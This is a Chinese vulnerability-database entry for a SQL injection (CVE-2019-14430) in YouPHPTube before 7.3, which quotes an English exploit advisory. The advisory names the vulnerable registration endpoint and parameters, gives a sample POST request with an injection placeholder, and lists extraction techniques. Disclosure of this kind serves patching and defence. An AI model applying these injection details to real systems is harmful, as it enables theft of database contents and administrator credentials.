YouPHPTube SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1708184 漏洞类型 SQL注入
发布时间 2019-08-20 更新时间 2019-08-27
CVE编号 CVE-2019-14430 CNNVD-ID CNNVD-201908-1288
漏洞平台 N/A CVSS评分 N/A
YouPHPTube是一套基于PHP的视频网站系统。 YouPHPTube 7.2版本中的plugin/Audit/Objects/AuditTable.php文件存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。
# Exploit Title: YouPHPTube < 7.3 SQL Injection
# Google Dork: /
# Date: 19.08.2019
# Exploit Author: Fabian Mosch, r-tec IT Security GmbH
# Vendor Homepage:
# Software Link:
# Version: < 7.3
# Tested on: Linux/Windows
# CVE : CVE-2019-14430

The parameters "User" as well as "pass" of the user registration function are vulnerable to SQL injection vulnerabilities. By submitting an HTTP POST request to the URL "/objects/userCreate.json.php" an attacker can access the database and read the hashed credentials of an administrator for example.

Example Request:

POST /objects/userCreate.json.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
[SomeHeaders and Cookies]

user=tes'INJECTHERE&pass=test'INJECTHERE &

Methods for DB-Extraction are:

- Boolean-based blind

- Error-based

- AND/OR time-based blind

The vulnerability was fixed with this commit: